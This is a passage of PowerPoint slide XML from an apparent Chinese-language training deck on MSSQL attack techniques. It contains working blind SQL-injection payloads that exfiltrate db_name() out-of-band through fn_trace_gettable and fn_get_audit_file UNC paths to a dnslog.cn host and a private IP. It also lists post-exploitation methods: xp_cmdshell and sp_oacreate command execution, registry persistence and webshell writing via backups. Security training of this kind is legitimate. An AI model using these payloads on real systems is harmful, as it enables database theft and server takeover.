              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>当注入点仅存在盲注时，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>出数据太慢，使用数据外带加速出数据。</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b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据外带</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"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不存在堆叠注入数据外带</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利用</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rPr>
              <a:t>fn_xe_file_target_read_file</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 </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rPr>
              <a:t>fn_get_audit_file</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 </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rPr>
              <a:t>fn_trace_gettable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>unc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>路径判断文件发起请求带出数据</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注入过程：</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id=1' and exists(select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>fn_trace_gettable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>('\\'%2b(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>db_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>())%2b'.g9f6y2.dnslog.cn\1.txt',default))--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1E2A37D-2853-4344-9E4D-BECDA2A86293}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6752116" y="5383512"/>
            <a:ext cx="4502307" cy="990061"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40996892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DD2E6D-2A2A-4437-AD96-86366062AD89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="921572" y="2382235"/>
            <a:ext cx="10577028" cy="4305531"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91419" tIns="45710" rIns="91419" bIns="45710"/>
          <a:lstStyle>
            <a:lvl1pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Lato Light" charset="0"/>
                <a:ea typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
                <a:cs typeface="MS PGothic" panose="020B0600070205080204" charset="-128"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="38862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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库技战法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="17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700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入查登录用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>扩展存储过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行命令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="17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700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>系统存储过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sp_oacreate+sp_oamethod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>执行命令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="17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700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>扩展存储过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xp_regwrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>写注册表（映像劫持，远程桌面，开机启动项等）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="17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700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CLR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>组件执行系统命令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="17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700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>系统存储过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>sp_addextendedproc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>恢复组件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="17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700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>差异备份写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>webshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="17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700" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>日志备份写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1700" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>webshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="17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en-US" altLang="zh-CN" sz="17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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{794BCE03-8D9E-4CE6-95DA-F6001CBAC070}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906719" y="1499986"/>
            <a:ext cx="3655121" cy="698268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F8C033"/>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>利用总结</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F8C033"/>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C4FFFE6-75ED-4B09-BE2A-F6514086A878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="503038" y="468853"/>
            <a:ext cx="2553904" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
                <a:ln w="0"/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:ln w="0"/>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0">
              <a:ln w="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21757990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a:t>注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>
            <a:ext cx="11545147" cy="492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注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709776" y="1885315"/>
            <a:ext cx="11482225" cy="337277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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>当注入点仅存在盲注时，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>出数据太慢，使用数据外带加速出数据。</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b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据外带</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"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不存在堆叠注入数据外带</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利用</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rPr>
              <a:t>fn_xe_file_target_read_file</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 </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rPr>
              <a:t>fn_get_audit_file</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rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>fn_trace_gettable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>unc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>路径判断文件发起请求带出数据</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zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>注入过程：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>id=1' and exists(select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>fn_get_audit_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>('\\192.168.172.130\'%2b(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>db_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>())%2b'.txt',default,default))--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C496EA73-2061-4835-AF91-672B3DF70001}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
